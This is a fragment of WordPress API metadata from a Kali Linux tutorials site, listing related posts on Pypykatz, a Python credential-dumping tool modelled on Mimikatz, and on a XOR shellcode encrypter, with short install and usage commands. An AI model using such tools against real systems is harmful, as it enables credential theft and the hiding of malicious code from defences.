https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/ChromeStealer.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":9831,"url":"https:\/\/kalilinuxtutorials.com\/pypykatz\/","url_meta":{"origin":34939,"position":4},"title":"Pypykatz : Mimikatz Implementation In Pure Python","author":"R K","date":"March 21, 2020","format":false,"excerpt":"Pypykatz is a mimikatz implementation in pure Python and can be runs on all OS's which support python>=3.6. Installing Install it via pip or by cloning it from github. The installer will create a pypykatz executable in the python's Script directory. You can run it from there, should be in\u2026","rel":"","context":"In "Kali Linux"","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":3116,"url":"https:\/\/kalilinuxtutorials.com\/shellcode-encrypter-decrypter\/","url_meta":{"origin":34939,"position":5},"title":"Shellcode-Encrypter-Decrypter : Shellcode Encrypter & Decrypter by using XOR Cipher","author":"R K","date":"November 5, 2018","format":false,"excerpt":"Shellcode-Encrypter-Decrypter is a Shellcode Encrypter & Decrypter, Using XOR Cipher to enc and dec shellcode. Shellcode-Encrypter-Decrypter Installation git clone https:\/\/github.com\/blacknbunny\/Shellcode-Encrypter-Decrypter.git && cd Shellcode-Encrypter-Decrypter\/ python enc.py --help Also ReadMunin \u2013 Online Hash Checker For Virustotal & Other Services Usage Example Encryption: python encdecshellcode.py --shellcode \\x41\\x41\\x42\\x42 --key SECRETKEY --option encrypt Decryption: python\u2026","rel":"","context":"In "Kali Linux"","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/04\/button_download.png?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/34939","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=34939"}],"version-history":[{"count":3,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/34939\/revisions"}],"predecessor-version":[{"id":34943,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/34939\/revisions\/34943"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/34944"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=34939"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=34939"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=34939"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}